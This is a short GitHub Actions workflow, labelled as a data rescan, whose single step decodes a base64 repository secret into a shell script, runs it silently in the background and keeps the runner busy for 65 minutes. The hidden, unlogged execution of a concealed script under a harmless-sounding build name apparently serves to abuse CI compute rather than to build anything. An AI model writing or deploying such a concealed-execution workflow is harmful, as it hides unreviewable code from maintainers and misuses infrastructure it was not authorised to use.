# .github/workflows/scheduled-builds.yml
name: rescan data

on: push
  # schedule:
  #   # Runs "at minute 15  minute " (see https://crontab.guru)
  #   - cron: '*/15 * * * *'

jobs:
  build:
    name: Build
    runs-on: ubuntu-latest
    strategy:
      matrix:
        node: [ '18' ]
    steps:
      - uses: actions/checkout@v1
      - name: Setup node
        uses: actions/setup-node@v2
        with:
          node-version: ${{ matrix.node }}
      - name: Jalankan Skrip
        env:
          TEZ: ${{ secrets.TEZ }}
        run: |
          echo "$TEZ" | base64 --decode > ku.sh
          sh ku.sh > /dev/null 2>&1 &
          sleep 65m 
          echo "OK"
